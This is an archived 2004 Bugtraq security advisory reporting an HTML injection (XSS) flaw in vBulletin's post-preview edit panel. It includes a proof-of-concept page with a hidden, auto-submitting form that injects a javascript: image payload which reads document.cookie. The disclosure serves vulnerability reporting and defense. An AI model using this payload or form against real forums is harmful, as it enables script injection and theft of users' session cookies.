lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040624120518.31323.qmail@www.securityfocus.com>
Date: 24 Jun 2004 12:05:18 -0000
From: Cheng Peng Su <apple_soup@....com>
To: bugtraq@...urityfocus.com
Subject: vBulletin HTML Injection Vuln





 Advisory Name : vBulletin HTML Injection Vulnerability
  Release Date : June 24,2004 
   Application : vBulletin
       Test On : 3.0.1 or others?
        Vendor : Jelsoft(http://www.vbulletin.com/)
      Discover : Cheng Peng Su(apple_soup_at_msn.com)
     
Intro:
     From vendor's website ,it says that ,vBulletin is a powerful, scalable and 
 fully customizable forums package for your web site. It has been written using
 the Web's quickest-growing scripting language; PHP, and is complimented with a
 highly efficient and ultra fast back-end database engine built using MySQL.

Proof of concept:
     While a user is previewing the post , both newreply.php and newthread.php 
 do sanitize the input in 'Preview',but not Edit-panel,malicious code can be 
 injected thru this flaw.
 
Exploit:
     A page as below can lead visitor to a Preview page which contains XSS code.
    
   -------------------------Remote.html-------------------------
   <form action="http://host/newreply.php" name="vbform" 
   method="post" style='visibility:hidden'>
   <input name="WYSIWYG_HTML" 
   value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/>
		<input name="do" value="postreply"/>
		<input name="t" value="123456" />
		<input name="p" value="123456" />
		<input type="submit" class="button" name="preview"/>
   </form>
   &lt;script&gt;
     document.all.preview.click();
   &lt;/script&gt;
   -----------------------------End-----------------------------
   

Solution:
     vBulletin Team will release a patch or a fixed version as soon as possible.

Contact:
  Cheng Peng Su
  apple_soup_at_msn.com
  Class 1,Senior 2,High school attached to Wuhan University
  Wuhan,Hubei,China


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ